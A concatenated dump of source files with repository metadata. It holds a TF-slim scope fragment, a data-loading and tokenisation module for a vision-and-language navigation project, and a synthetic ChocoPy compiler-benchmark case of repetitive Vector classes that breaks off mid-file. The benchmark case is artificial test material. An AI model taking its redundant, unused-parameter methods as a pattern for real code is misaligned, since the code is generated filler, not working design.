normalizer_params = {}
    # Apply weight decay (L2 regularization) to conv and fully-connected weights
with slim.arg_scope([slim.conv2d, slim.fully_connected],
weights_regularizer=slim.l2_regularizer(weight_decay)):
with slim.arg_scope(
[slim.conv2d],
weights_initializer=slim.variance_scaling_initializer(),
activation_fn=activation_fn,
normalizer_fn=normalizer_fn,
normalizer_params=normalizer_params) as sc:
return sc
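# A minimal usage sketch, assuming a TF1.x graph and a placeholder `images`
# tensor; layers built inside the scope inherit the shared regularizer,
# initializer and batch-norm settings:
#
# with slim.arg_scope(inception_arg_scope(weight_decay=4e-5)):
#     net = slim.conv2d(images, 32, [3, 3], scope='conv1')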
|
[
"knowmefly@qq.com"
] |
knowmefly@qq.com
|
31377b78b9aa2c2a50c21500d418eb84e8d65b07
|
ae5bc58aea259f9e633398b99e9705c89a0cea3d
|
/tasks/viewpoint_select/utils_data.py
|
15883db86b9b6068ef4ef746b53f5f631cafb115
|
[
"MIT-0"
] |
permissive
|
ayshrv/visitron
|
3bacefd4cf62c66864cfcdba4e24af7a576590dd
|
2f30e6c002ed021d2be209a94a5e77c2d7e2117f
|
refs/heads/main
| 2023-06-03T17:47:06.905510
| 2021-06-30T22:18:55
| 2021-06-30T22:18:55
| 302,179,557
| 1
| 0
|
NOASSERTION
| 2021-06-30T22:59:18
| 2020-10-07T22:56:49
|
Python
|
UTF-8
|
Python
| false
| false
| 20,796
|
py
|
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: MIT-0
import base64
import csv
import json
import logging
import math
import os
import pickle
import re
import sys
import time
from itertools import chain
import lmdb
import networkx as nx
import numpy as np
from tqdm import tqdm
csv.field_size_limit(sys.maxsize)
logger = logging.getLogger(__name__)
def load_nav_graphs(scans):
""" Load connectivity graph for each scan """
def distance(pose1, pose2):
""" Euclidean distance between two graph poses """
return (
(pose1["pose"][3] - pose2["pose"][3]) ** 2
+ (pose1["pose"][7] - pose2["pose"][7]) ** 2
+ (pose1["pose"][11] - pose2["pose"][11]) ** 2
) ** 0.5
graphs = {}
for scan in scans:
with open("connectivity/%s_connectivity.json" % scan) as f:
G = nx.Graph()
positions = {}
data = json.load(f)
for i, item in enumerate(data):
if item["included"]:
for j, conn in enumerate(item["unobstructed"]):
if conn and data[j]["included"]:
positions[item["image_id"]] = np.array(
[item["pose"][3], item["pose"][7], item["pose"][11]]
)
assert data[j]["unobstructed"][
i
], "Graph should be undirected"
G.add_edge(
item["image_id"],
data[j]["image_id"],
weight=distance(item, data[j]),
)
nx.set_node_attributes(G, values=positions, name="position")
graphs[scan] = G
return graphs
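# A minimal usage sketch (the scan id is a placeholder); the returned
# networkx graphs support standard shortest-path queries over the edge
# weights set above:
#
# graphs = load_nav_graphs(["<scan_id>"])
# dists = dict(nx.all_pairs_dijkstra_path_length(graphs["<scan_id>"], weight="weight"))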
def get_data_root(dataset_type="NDH"):
if dataset_type == "NDH":
data_root = "srv/task_data/NDH/data/"
elif dataset_type == "CVDN":
data_root = "srv/task_data/CVDN/data/"
elif dataset_type == "R2R":
data_root = "srv/task_data/R2R/data/R2R_"
elif dataset_type == "R4R":
data_root = "srv/task_data/R4R/data/R4R_"
elif dataset_type == "RxR":
data_root = "srv/task_data/RxR/data"
elif dataset_type == "PretrainNDH":
data_root = "srv/task_data/pretrain_data/NDH_"
elif dataset_type == "PretrainR2R":
data_root = "srv/task_data/pretrain_data/R2R_"
elif dataset_type == "PretrainR4R":
data_root = "srv/task_data/pretrain_data/R4R_"
elif dataset_type == "PretrainRxR":
data_root = "srv/task_data/pretrain_data/RxR_"
else:
raise NotImplementedError
return data_root
def load_datasets(splits, dataset_type="NDH"):
data = []
data_root = get_data_root(dataset_type)
if dataset_type == "RxR":
import jsonlines
assert splits == ["train"]
with jsonlines.open(f"{data_root}/rxr_train_guide.jsonl") as f:
for line in f.iter():
data.append(line)
return data
for split in splits:
assert split in ["train", "val_seen", "val_unseen", "test"]
with open(data_root + "%s.json" % split) as f:
data += json.load(f)
return data
def load_classifier_data(splits):
data = []
raw_data = []
data_root = get_data_root("CVDN")
for split in splits:
assert split in ["train", "val_seen", "val_unseen", "test"]
data_path = data_root + "%s.json" % split
with open(data_path) as f:
items = json.load(f)
raw_data.extend(items)
for item in raw_data:
item["inst_idx"] = str(item["idx"])
item["planner_path"] = item["planner_nav_steps"]
item["player_path"] = item["nav_steps"]
item["nav_history"] = item["player_path"]
heading, elevation = 2.0, 17.5
if "nav_camera" in item and len(item["nav_camera"]) > 0:
nav_camera = item["nav_camera"][0]
if "message" in nav_camera:
heading = nav_camera["message"][-1]["heading"]
elevation = nav_camera["message"][-1]["elevation"]
item["start_pano"] = {
"heading": heading,
"elevation": elevation,
"pano": item["planner_nav_steps"][0],
}
dialog = {0: []}
last_timestep = 0
for index, turn in enumerate(item["dialog_history"]):
if index % 2 == 0:
assert turn["role"] == "navigator"
timestep = turn["nav_idx"]
message = turn["message"]
dialog_history = dialog[last_timestep]
dialog_history.append(message)
dialog[timestep] = dialog_history
last_timestep = timestep
else:
if timestep != turn["nav_idx"]:
logger.info(
"Timestep for oracle and navigator mismatch, correcting it. "
f"Timestep: {timestep} turn['nav_idx']: {turn['nav_idx']}"
)
assert turn["role"] == "oracle"
message = turn["message"]
dialog_history = dialog[timestep]
dialog_history.append(message)
dialog[timestep] = dialog_history
item["dialog_history"] = dialog
item["request_locations"] = list(dialog.keys())
data.append(item)
return data
def load_gameplay_data(splits):
data = []
data_root = get_data_root("CVDN")
for split in splits:
assert split in ["train", "val_seen", "val_unseen", "test"]
logger.info("Using CVDN for " + split + "!\n\n\n")
data_source = data_root + split + ".json"
with open(data_source) as f:
items = json.load(f)
new_items = []
for item in items:
item["inst_idx"] = item["idx"]
item["planner_path"] = item["planner_nav_steps"]
item["player_path"] = item["nav_steps"]
item["nav_history"] = item["player_path"]
heading, elevation = 2.0, 17.5
if "nav_camera" in item and len(item["nav_camera"]) > 0:
nav_camera = item["nav_camera"][0]
if "message" in nav_camera:
heading = nav_camera["message"][-1]["heading"]
elevation = nav_camera["message"][-1]["elevation"]
item["start_pano"] = {
"heading": heading,
"elevation": elevation,
"pano": item["planner_nav_steps"][0],
}
nav_ins, ora_ins, request_locations, nav_seen, ora_seen, nav_idx = (
[],
[],
{},
[],
[],
0,
)
for index, turn in enumerate(item["dialog_history"]):
if turn["role"] == "navigator":
nav_ins.append(turn["message"])
if len(ora_seen) > 0:
request_locations[nav_idx] = [
" ".join(nav_seen),
" ".join(ora_seen),
index,
]
ora_seen = []
nav_seen = []
nav_seen.append(turn["message"])
else:
ora_ins.append(turn["message"])
if len(nav_seen) > 0:
nav_idx = int(turn["nav_idx"])
ora_seen.append(turn["message"])
if len(ora_seen) > 0:
request_locations[nav_idx] = [
nav_seen[-1],
ora_seen[-1],
len(item["dialog_history"]),
] # [' '.join(nav_seen), ' '.join(ora_seen), len(item['dialog_history'])]
item["nav_instructions"] = " ".join(nav_ins)
item["ora_instructions"] = " ".join(ora_ins)
if (
len(item["nav_instructions"]) == 0
or len(item["ora_instructions"]) == 0
):
continue
item["request_locations"] = request_locations
item["inst_idx"] = str(item["inst_idx"])
assert len(item["player_path"]) > 1, item["player_path"]
new_items.append(item)
data += new_items
return data
def save_preprocessed_data(data, splits, version, dataset_type="NDH"):
data_root = get_data_root(dataset_type)
combined_split = "_".join(splits)
path = f"{data_root}{combined_split}_preprocessed_{version}.pickle"
logger.info(f"Saving preprocessed data to {path}")
with open(path, "wb") as handle:
pickle.dump(data, handle, protocol=-1)
def check_and_load_preprocessed_data(splits, version, dataset_type="NDH"):
if dataset_type == "NDH":
data_root = "srv/task_data/NDH/data/"
elif dataset_type == "R2R":
data_root = "srv/task_data/R2R/data/R2R_"
elif dataset_type == "R4R":
data_root = "srv/task_data/R4R/data/R4R_"
elif dataset_type == "RxR":
data_root = "srv/task_data/RxR/data/RxR_"
elif dataset_type == "PretrainNDH":
data_root = "srv/task_data/pretrain_data/NDH_"
elif dataset_type == "PretrainR2R":
data_root = "srv/task_data/pretrain_data/R2R_"
elif dataset_type == "PretrainR4R":
data_root = "srv/task_data/pretrain_data/R4R_"
elif dataset_type == "PretrainRxR":
data_root = "srv/task_data/pretrain_data/RxR_"
else:
raise NotImplementedError
combined_split = "_".join(splits)
path = f"{data_root}{combined_split}_preprocessed_{version}.pickle"
if os.path.exists(path) and os.path.isfile(path):
logger.info(f"Loading preprocessed data from {path}")
t_s = time.time()
with open(path, "rb") as handle:
data = pickle.load(handle)
t_e = time.time()
logger.info(
"Loaded Image Features from {} in time: {:0.2f} mins".format(
path, (t_e - t_s) / 60.0
)
)
return data
return False
def truncate_dialogs(sentences, amount, left=True):
"""
    Truncate `sentences` at token level to at most `amount` tokens, trimming from the direction given by `left`.
    Each turn is counted as len(turn) + 1 tokens, since its `[QUES]` or `[ANS]` tag must be counted as well.
"""
if amount is None:
return sentences
if (len(list(chain(*sentences))) + len(sentences)) <= amount:
return sentences
if left:
reversed_sentences = sentences[::-1]
reversed_truncated_sentences = []
amount_appended = 0
for turn in reversed_sentences:
if amount_appended < amount:
remaining_amount = amount - amount_appended
if (len(turn) + 1) <= remaining_amount:
reversed_truncated_sentences.append(turn)
amount_appended += len(turn) + 1
else:
reversed_truncated_sentences.append(turn[-remaining_amount + 1 :])
amount_appended += len(turn[-remaining_amount + 1 :]) + 1
break # can break out of the loop at this point
truncated_sentences = reversed_truncated_sentences[::-1]
return truncated_sentences
else:
truncated_sentences = []
amount_appended = 0
for turn in sentences:
if amount_appended < amount:
remaining_amount = amount - amount_appended
if (len(turn) + 1) <= remaining_amount:
truncated_sentences.append(turn)
amount_appended += len(turn) + 1
else:
truncated_sentences.append(turn[: remaining_amount - 1])
amount_appended += len(turn[: remaining_amount - 1]) + 1
break # can break out of the loop at this point
return truncated_sentences
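# Worked example: with sentences = [["a", "b"], ["c"]] each turn costs
# len(turn) + 1 tokens (5 total), so amount=4 drops the oldest token first:
#
# truncate_dialogs([["a", "b"], ["c"]], amount=4, left=True)  # -> [["b"], ["c"]]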
def read_tsv_img_features(path=None, feature_size=2048, blind=False):
if path:
logger.info("Loading image features from %s" % path)
if blind:
logger.info("... and zeroing them out for 'blind' evaluation")
tsv_fieldnames = [
"scanId",
"viewpointId",
"image_w",
"image_h",
"vfov",
"features",
]
features = {}
with open(path, "rt") as tsv_in_file:
reader = csv.DictReader(
tsv_in_file, delimiter="\t", fieldnames=tsv_fieldnames
)
for item in reader:
image_h = int(item["image_h"])
image_w = int(item["image_w"])
vfov = int(item["vfov"])
long_id = item["scanId"] + "_" + item["viewpointId"]
if not blind:
features[long_id] = np.frombuffer(
base64.b64decode(item["features"]), dtype=np.float32
).reshape((36, feature_size))
else:
features[long_id] = np.zeros((36, feature_size), dtype=np.float32)
else:
logger.info("Image features not provided")
features = None
image_w = 640
image_h = 480
vfov = 60
dictionary = {
"features": features,
"image_w": image_w,
"image_h": image_h,
"vfov": vfov,
}
return dictionary
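# Hypothetical usage sketch (the TSV path is a placeholder):
#
# feats = read_tsv_img_features(path="<features>.tsv", feature_size=2048)
# view_feats = feats["features"]["<scanId>_<viewpointId>"]  # (36, 2048) array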
def timeSince(since, percent):
now = time.time()
s = now - since
es = s / percent
rs = es - s
return "%s (- %s)" % (asMinutes(s), asMinutes(rs))
def asMinutes(s):
m = math.floor(s / 60)
s -= m * 60
return "%dm %ds" % (m, s)
def load_detector_classes(UPDOWN_DATA="srv/detector_classes_attributes"):
classes = ["__background__"]
with open(os.path.join(UPDOWN_DATA, "objects_vocab.txt")) as f:
for object in f.readlines():
classes.append(object.split(",")[0].lower().strip())
return classes
class FeaturesReader:
def __init__(self, path, use_lmdb=True, in_memory=False):
self.use_lmdb = use_lmdb
if not self.use_lmdb:
(
self.keys,
self.features,
self.region_tokens,
self.image_w,
self.image_h,
self.vfov,
) = self.load_features_from_pickle(path)
else:
img_feature_path = path + ".lmdb"
logger.info(f"Loading lmdb features from {img_feature_path}")
# open database
self.env = lmdb.open(
img_feature_path,
readonly=True,
readahead=False,
max_readers=1,
lock=False,
)
# get keys
with self.env.begin(write=False) as txn:
self.keys = pickle.loads(txn.get("keys".encode()))
key = self.keys[0]
with self.env.begin(write=False) as txn:
item = pickle.loads(txn.get(key))
self.image_w = item["image_w"]
self.image_h = item["image_h"]
self.vfov = item["vfov"]
region_labels_path = path + "-region_labels.pickle"
with open(region_labels_path, "rb") as handle:
self.region_tokens = pickle.load(handle)
logger.info(f"Loaded region labels from {region_labels_path}")
# get viewpoints
self.viewpoints = {}
for key in self.keys:
scan_id, viewpoint_id, feature_view_index = key.decode().split("_")
if scan_id not in self.viewpoints:
self.viewpoints[scan_id] = set()
self.viewpoints[scan_id].add(viewpoint_id)
def load_features_from_pickle(self, path):
t_s = time.time()
img_feature_path = path + ".pickle"
logger.info(f"Loading Image Features from {img_feature_path}")
with open(img_feature_path, "rb") as f:
loaded_feature_data = pickle.load(f)
image_w = loaded_feature_data[0]["image_w"]
image_h = loaded_feature_data[0]["image_h"]
vfov = loaded_feature_data[0]["vfov"]
keys = []
features = {}
region_tokens = {}
for item in loaded_feature_data:
long_id = (
f"{item['scanId']}_{item['viewpointId']}_{item['featureViewIndex']}"
).encode()
features[long_id] = item["features"]
region_tokens[long_id] = item["region_tokens"]
keys.append(long_id)
t_e = time.time()
logger.info(
"Loaded Image Features from {} in time: {:0.2f} mins".format(
img_feature_path, (t_e - t_s) / 60.0
)
)
return keys, features, region_tokens, image_w, image_h, vfov
def __len__(self):
return len(self.keys)
def __getitem__(self, key):
if key not in self.keys:
raise TypeError(f"invalid key: {key}")
if self.use_lmdb:
# load from disk
with self.env.begin(write=False) as txn:
item = pickle.loads(txn.get(key))
return item["features"]
else:
return self.features[key]
def get_region_tokens(self, key):
if key not in self.keys:
raise TypeError(f"invalid key: {key}")
return self.region_tokens[key]
def get_encoding_for_oscar(tokenizer, obs):
truncate_dialog = True
use_oscar_settings = True
TAR_BACK = False
pad_token_id = 0
cls_token_segment_id = 0
pad_token_segment_id = 0
sep_token_segment_id = 0
tar_token_segment_id = 1
ques_token_segment_id = 2
ans_token_segment_id = 3
MAX_SEQ_LENGTH = 512
MAX_DIALOG_LEN = 512 - 4 # including [QUES]s and [ANS]s
MAX_TARGET_LENGTH = 4 - 2 # [CLS], [TAR], [SEP] after QA and before Action
# # TOTAL 768
new_obs = []
for item in obs:
instruction = item["instructions"]
target = instruction.split("<TAR>")[1]
rest = instruction.split("<TAR>")[0]
dialog_history = re.split("<NAV>|<ORA>", rest)
dialog_history = [item for item in dialog_history if item != ""]
token_target = tokenizer.tokenize(target)
token_target = token_target[:MAX_TARGET_LENGTH]
token_dialog_history = []
for turn in dialog_history:
token_turn = tokenizer.tokenize(turn)
token_dialog_history.append(token_turn)
if truncate_dialog:
# max_seq_length - 4 as accounting for [CLS], [TAR], Target, [SEP]
token_dialog_history = truncate_dialogs(
token_dialog_history, amount=MAX_DIALOG_LEN, left=True
)
tokens = [tokenizer.cls_token]
segment_ids = [cls_token_segment_id]
if not TAR_BACK:
if use_oscar_settings:
sep_token = tokenizer.sep_token
else:
sep_token = tokenizer.tar_token
tokens += [sep_token] + token_target
segment_ids += [tar_token_segment_id] * (len(token_target) + 1)
for i, turn in enumerate(token_dialog_history):
if use_oscar_settings:
sep_token = tokenizer.sep_token
segment_id = sep_token_segment_id
else:
if i % 2 == 0:
sep_token = tokenizer.ques_token
segment_id = ques_token_segment_id
else:
sep_token = tokenizer.ans_token
segment_id = ans_token_segment_id
tokens += [sep_token] + turn
segment_ids += [segment_id] * (len(turn) + 1)
if TAR_BACK:
if use_oscar_settings:
sep_token = tokenizer.sep_token
else:
sep_token = tokenizer.tar_token
tokens += [sep_token] + token_target
segment_ids += [tar_token_segment_id] * (len(token_target) + 1)
tokens += [tokenizer.sep_token]
segment_ids += [sep_token_segment_id]
        # pad with the tokenizer's pad token (a string, so convert_tokens_to_ids below works)
        tokens += [tokenizer.pad_token] * (MAX_SEQ_LENGTH - len(tokens) - 1)
segment_ids += [pad_token_segment_id] * (MAX_SEQ_LENGTH - len(segment_ids) - 1)
token_ids = tokenizer.convert_tokens_to_ids(tokens)
new_obs.append({"instr_encoding": token_ids, "segment_ids": segment_ids})
# "tokens": tokens
return new_obs
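# For reference, the instruction format this parser assumes (inferred from
# the split calls above): dialog turns tagged with <NAV>/<ORA>, followed by
# a single <TAR> target phrase, e.g.
#
# "<NAV> where should i go <ORA> head up the stairs <TAR> a red chair"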
|
[
"shrivastava.ayush1996@gmail.com"
] |
shrivastava.ayush1996@gmail.com
|
516909e27870935ab937ccd022e1ac2e00a7cc98
|
c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c
|
/cases/synthetic/sieve-big-2404.py
|
36bdabeba62a66987aa786e8dfdb76e27f414dcd
|
[] |
no_license
|
Virtlink/ccbench-chocopy
|
c3f7f6af6349aff6503196f727ef89f210a1eac8
|
c7efae43bf32696ee2b2ee781bdfe4f7730dec3f
|
refs/heads/main
| 2023-04-07T15:07:12.464038
| 2022-02-03T15:42:39
| 2022-02-03T15:42:39
| 451,969,776
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 31,752
|
py
|
# A resizable list of integers
class Vector(object):
items: [int] = None
size: int = 0
def __init__(self:"Vector"):
self.items = [0]
# Returns current capacity
def capacity(self:"Vector") -> int:
return len(self.items)
# Increases capacity of vector by one element
def increase_capacity(self:"Vector") -> int:
self.items = self.items + [0]
return self.capacity()
# Appends one item to end of vector
def append(self:"Vector", item: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends many items to end of vector
def append_all(self:"Vector", new_items: [int]) -> object:
item:int = 0
for item in new_items:
self.append(item)
# Removes an item from the middle of vector
def remove_at(self:"Vector", idx: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Retrieves an item at a given index
def get(self:"Vector", idx: int) -> int:
return self.items[idx]
# Retrieves the current size of the vector
def length(self:"Vector") -> int:
return self.size
# A resizable list of integers
class Vector2(object):
items: [int] = None
items2: [int] = None
size: int = 0
size2: int = 0
def __init__(self:"Vector2"):
self.items = [0]
# Returns current capacity
def capacity(self:"Vector2") -> int:
return len(self.items)
# Returns current capacity
def capacity2(self:"Vector2") -> int:
return len(self.items)
# Increases capacity of vector by one element
def increase_capacity(self:"Vector2") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity2(self:"Vector2") -> int:
self.items = self.items + [0]
return self.capacity()
# Appends one item to end of vector
def append(self:"Vector2", item: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append2(self:"Vector2", item: int, item2: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends many items to end of vector
def append_all(self:"Vector2", new_items: [int]) -> object:
item:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all2(self:"Vector2", new_items: [int], new_items2: [int]) -> object:
item:int = 0
item2:int = 0
for item in new_items:
self.append(item)
# Removes an item from the middle of vector
def remove_at(self:"Vector2", idx: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at2(self:"Vector2", idx: int, idx2: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Retrieves an item at a given index
def get(self:"Vector2", idx: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get2(self:"Vector2", idx: int, idx2: int) -> int:
return self.items[idx]
# Retrieves the current size of the vector
def length(self:"Vector2") -> int:
return self.size
# Retrieves the current size of the vector
def length2(self:"Vector2") -> int:
return self.size
# A resizable list of integers
class Vector3(object):
items: [int] = None
items2: [int] = None
items3: [int] = None
size: int = 0
size2: int = 0
size3: int = 0
def __init__(self:"Vector3"):
self.items = [0]
# Returns current capacity
def capacity(self:"Vector3") -> int:
return len(self.items)
# Returns current capacity
def capacity2(self:"Vector3") -> int:
return len(self.items)
# Returns current capacity
def capacity3(self:"Vector3") -> int:
return len(self.items)
# Increases capacity of vector by one element
def increase_capacity(self:"Vector3") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity2(self:"Vector3") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity3(self:"Vector3") -> int:
self.items = self.items + [0]
return self.capacity()
# Appends one item to end of vector
def append(self:"Vector3", item: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append2(self:"Vector3", item: int, item2: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append3(self:"Vector3", item: int, item2: int, item3: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends many items to end of vector
def append_all(self:"Vector3", new_items: [int]) -> object:
item:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all2(self:"Vector3", new_items: [int], new_items2: [int]) -> object:
item:int = 0
item2:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all3(self:"Vector3", new_items: [int], new_items2: [int], new_items3: [int]) -> object:
item:int = 0
item2:int = 0
item3:int = 0
for item in new_items:
self.append(item)
# Removes an item from the middle of vector
def remove_at(self:"Vector3", idx: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at2(self:"Vector3", idx: int, idx2: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at3(self:"Vector3", idx: int, idx2: int, idx3: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Retrieves an item at a given index
def get(self:"Vector3", idx: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get2(self:"Vector3", idx: int, idx2: int) -> int:
        return self.items[idx]
# Retrieves an item at a given index
def get3(self:"Vector3", idx: int, idx2: int, idx3: int) -> int:
return self.items[idx]
# Retrieves the current size of the vector
def length(self:"Vector3") -> int:
return self.size
# Retrieves the current size of the vector
def length2(self:"Vector3") -> int:
return self.size
# Retrieves the current size of the vector
def length3(self:"Vector3") -> int:
return self.size
# A resizable list of integers
class Vector4(object):
items: [int] = None
items2: [int] = None
items3: [int] = None
items4: [int] = None
size: int = 0
size2: int = 0
size3: int = 0
size4: int = 0
def __init__(self:"Vector4"):
self.items = [0]
# Returns current capacity
def capacity(self:"Vector4") -> int:
return len(self.items)
# Returns current capacity
def capacity2(self:"Vector4") -> int:
return len(self.items)
# Returns current capacity
def capacity3(self:"Vector4") -> int:
return len(self.items)
# Returns current capacity
def capacity4(self:"Vector4") -> int:
return len(self.items)
# Increases capacity of vector by one element
def increase_capacity(self:"Vector4") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity2(self:"Vector4") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity3(self:"Vector4") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity4(self:"Vector4") -> int:
self.items = self.items + [0]
return self.capacity()
# Appends one item to end of vector
def append(self:"Vector4", item: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append2(self:"Vector4", item: int, item2: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append3(self:"Vector4", item: int, item2: int, item3: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append4(self:"Vector4", item: int, item2: int, item3: int, item4: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends many items to end of vector
def append_all(self:"Vector4", new_items: [int]) -> object:
item:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all2(self:"Vector4", new_items: [int], new_items2: [int]) -> object:
item:int = 0
item2:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all3(self:"Vector4", new_items: [int], new_items2: [int], new_items3: [int]) -> object:
item:int = 0
item2:int = 0
item3:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all4(self:"Vector4", new_items: [int], new_items2: [int], new_items3: [int], new_items4: [int]) -> object:
item:int = 0
item2:int = 0
item3:int = 0
item4:int = 0
for item in new_items:
self.append(item)
# Removes an item from the middle of vector
def remove_at(self:"Vector4", idx: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at2(self:"Vector4", idx: int, idx2: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at3(self:"Vector4", idx: int, idx2: int, idx3: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at4(self:"Vector4", idx: int, idx2: int, idx3: int, idx4: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Retrieves an item at a given index
def get(self:"Vector4", idx: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get2(self:"Vector4", idx: int, idx2: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get3(self:"Vector4", idx: int, idx2: int, idx3: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get4(self:"Vector4", idx: int, idx2: int, idx3: int, idx4: int) -> int:
return self.items[idx]
# Retrieves the current size of the vector
def length(self:"Vector4") -> int:
return self.size
# Retrieves the current size of the vector
def length2(self:"Vector4") -> int:
return self.size
# Retrieves the current size of the vector
def length3(self:"Vector4") -> int:
return self.size
# Retrieves the current size of the vector
def length4(self:"Vector4") -> int:
return self.size
# A resizable list of integers
class Vector5(object):
items: [int] = None
items2: [int] = None
items3: [int] = None
items4: [int] = None
items5: [int] = None
size: int = 0
size2: int = 0
size3: int = 0
size4: int = 0
size5: int = 0
def __init__(self:"Vector5"):
self.items = [0]
# Returns current capacity
def capacity(self:"Vector5") -> int:
return len(self.items)
# Returns current capacity
def capacity2(self:"Vector5") -> int:
return len(self.items)
# Returns current capacity
def capacity3(self:"Vector5") -> int:
return len(self.items)
# Returns current capacity
def capacity4(self:"Vector5") -> int:
return len(self.items)
# Returns current capacity
def capacity5(self:"Vector5") -> int:
return len(self.items)
# Increases capacity of vector by one element
def increase_capacity(self:"Vector5") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity2(self:"Vector5") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity3(self:"Vector5") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity4(self:"Vector5") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity5(self:"Vector5") -> int:
self.items = self.items + [0]
return self.capacity()
# Appends one item to end of vector
def append(self:"Vector5", item: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append2(self:"Vector5", item: int, item2: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append3(self:"Vector5", item: int, item2: int, item3: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append4(self:"Vector5", item: int, item2: int, item3: int, item4: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append5(self:"Vector5", item: int, item2: int, item3: int, item4: int, item5: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends many items to end of vector
def append_all(self:"Vector5", new_items: [int]) -> object:
item:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all2(self:"Vector5", new_items: [int], new_items2: [int]) -> object:
item:int = 0
item2:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all3(self:"Vector5", new_items: [int], new_items2: [int], new_items3: [int]) -> object:
item:int = 0
item2:int = 0
item3:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all4(self:"Vector5", new_items: [int], new_items2: [int], new_items3: [int], new_items4: [int]) -> object:
item:int = 0
item2:int = 0
item3:int = 0
item4:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all5(self:"Vector5", new_items: [int], new_items2: [int], new_items3: [int], new_items4: [int], new_items5: [int]) -> object:
item:int = 0
item2:int = 0
item3:int = 0
item4:int = 0
item5:int = 0
for item in new_items:
self.append(item)
# Removes an item from the middle of vector
def remove_at(self:"Vector5", idx: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
